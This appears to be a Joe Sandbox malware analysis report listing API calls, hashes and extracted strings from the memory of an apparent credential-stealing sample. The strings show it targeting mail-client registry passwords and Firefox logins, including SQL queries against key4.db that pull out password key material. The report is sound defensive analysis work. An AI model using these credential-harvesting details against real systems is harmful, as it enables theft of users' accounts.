                                                                                              • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • VirtualProtect.KERNELBASE(?,00000078,00000004), ref: 0044B43E
                                                                                              • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000078,00000004), ref: 0044B452
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ProtectVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 544645111-0
                                                                                              • Opcode ID: 7b0ab345f8b147095ec499268aed239778a4d345bd8648cab821ed5a180e1bce
                                                                                              • Instruction ID: ac13c79d7fe72252008cad2d8c7d399cb1c4cdb5f22be9a76d9ffffc69c753be
                                                                                              • Opcode Fuzzy Hash: 7b0ab345f8b147095ec499268aed239778a4d345bd8648cab821ed5a180e1bce
                                                                                              • Instruction Fuzzy Hash: 86F0A4011896907DFA2199B90C42BB75BCCCB27320B240B4BF690C7283D69DCA1693FA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                              • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                              • String ID:
                                                                                              • API String ID: 145871493-0
                                                                                              • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                              • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                              • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                              • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                              • String ID:
                                                                                              • API String ID: 4165544737-0
                                                                                              • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                              • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                              • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                              • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                              • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                              • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                              • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                              • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                              • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                              • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                              • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                              • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                              • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnumNamesResource
                                                                                              • String ID:
                                                                                              • API String ID: 3334572018-0
                                                                                              • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                              • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                                                              • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                              • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseFind
                                                                                              • String ID:
                                                                                              • API String ID: 1863332320-0
                                                                                              • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                              • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                              • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                              • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                              • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                              • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                              • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                              • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                              • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                              • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                                                                                              • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                              • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                              • API String ID: 2238633743-192783356
                                                                                              • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
• Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
• Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
• Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: PrivateProfileString_mbscmpstrlen
• String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
• API String ID: 3963849919-1658304561
• Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
• Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
• Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
• Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: ??2@??3@memcpymemset
• String ID: (yE$(yE$(yE
• API String ID: 1865533344-362086290
• Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
• Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
• Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
• Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
  • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
  • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
  • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
• memset.MSVCRT ref: 0040E5B8
• memset.MSVCRT ref: 0040E5CD
• _mbscpy.MSVCRT ref: 0040E634
• _mbscpy.MSVCRT ref: 0040E64A
• _mbscpy.MSVCRT ref: 0040E660
• _mbscpy.MSVCRT ref: 0040E676
• _mbscpy.MSVCRT ref: 0040E68C
• _mbscpy.MSVCRT ref: 0040E69F
• memset.MSVCRT ref: 0040E6B5
• memset.MSVCRT ref: 0040E6CC
  • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
  • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
• memset.MSVCRT ref: 0040E736
• memset.MSVCRT ref: 0040E74F
• sprintf.MSVCRT ref: 0040E76D
• sprintf.MSVCRT ref: 0040E788
• _strcmpi.MSVCRT ref: 0040E79E
• _strcmpi.MSVCRT ref: 0040E7B7
• _strcmpi.MSVCRT ref: 0040E7D3
• memset.MSVCRT ref: 0040E858
• sprintf.MSVCRT ref: 0040E873
• _strcmpi.MSVCRT ref: 0040E889
• _strcmpi.MSVCRT ref: 0040E8A5
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
• String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
• API String ID: 4171719235-3943159138
• Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
• Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
• Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
• Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,000003E9), ref: 0041042E
• GetDlgItem.USER32(?,000003E8), ref: 0041043A
• GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
• GetWindowLongA.USER32(?,000000F0), ref: 00410455
• GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
• GetWindowLongA.USER32(?,000000EC), ref: 0041046A
• GetWindowRect.USER32(00000000,?), ref: 0041047C
• GetWindowRect.USER32(?,?), ref: 00410487
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
• GetDC.USER32 ref: 004104E2
• strlen.MSVCRT ref: 00410522
• GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
• ReleaseDC.USER32(?,?), ref: 00410580
• sprintf.MSVCRT ref: 00410640
• SetWindowTextA.USER32(?,?), ref: 00410654
• SetWindowTextA.USER32(?,00000000), ref: 00410672
• GetDlgItem.USER32(?,00000001), ref: 004106A8
• GetWindowRect.USER32(00000000,?), ref: 004106B8
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
• GetClientRect.USER32(?,?), ref: 004106DD
• GetWindowRect.USER32(?,?), ref: 004106E7
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
• GetClientRect.USER32(?,?), ref: 00410737
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
• String ID: %s:$EDIT$STATIC
• API String ID: 1703216249-3046471546
• Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
• Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
• Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
• Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 004024F5
  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
• _mbscpy.MSVCRT ref: 00402533
• _mbscpy.MSVCRT ref: 004025FD
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: _mbscpy$QueryValuememset
• String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
• API String ID: 168965057-606283353
• Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
• Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
• Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
• Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00402869
  • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
• _mbscpy.MSVCRT ref: 004028A3
  • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
• _mbscpy.MSVCRT ref: 0040297B
  • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: QueryValue_mbscpy$ByteCharMultiWidememset
• String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
• API String ID: 1497257669-167382505
• Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
• Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
• Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
• Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,000003EC), ref: 004010BC
• ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
• GetDlgItem.USER32(?,000003EE), ref: 00401103
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
• GetDlgItem.USER32(?,000003EC), ref: 0040113E
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
• LoadCursorA.USER32(00000067), ref: 0040115F
• SetCursor.USER32(00000000,?,?), ref: 00401166
• GetDlgItem.USER32(?,000003EE), ref: 00401186
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
• GetDlgItem.USER32(?,000003EC), ref: 004011AD
• SetBkMode.GDI32(?,00000001), ref: 004011B9
• SetTextColor.GDI32(?,00C00000), ref: 004011C7
• GetSysColorBrush.USER32(0000000F), ref: 004011CF
• GetDlgItem.USER32(?,000003EE), ref: 004011EF
• EndDialog.USER32(?,00000001), ref: 0040121A
• DeleteObject.GDI32(?), ref: 00401226
• GetDlgItem.USER32(?,000003ED), ref: 0040124A
• ShowWindow.USER32(00000000), ref: 00401253
• GetDlgItem.USER32(?,000003EE), ref: 0040125F
• ShowWindow.USER32(00000000), ref: 00401262
• SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
• memset.MSVCRT ref: 0040128E
• SetWindowTextA.USER32(?,00000000), ref: 004012AA
• SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
• SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
• String ID:
• API String ID: 2998058495-0
• Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
• Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
• Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
• Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: memcmp$memcpy
• String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
• API String ID: 231171946-2189169393
• Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
• Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
• Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
• Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: _mbscat$memsetsprintf$_mbscpy
• String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
• API String ID: 633282248-1996832678
• Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
• Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
• Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
• Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
• , xrefs: 00406834
• key4.db, xrefs: 00406756
• SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
• SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
Memory Dump Source
• Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_wab.jbxd
Similarity
• API ID: memcpy$memcmp$memsetstrlen
                                                                                              • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                              • API String ID: 3614188050-3983245814
                                                                                              • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                              • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                              • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                              • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
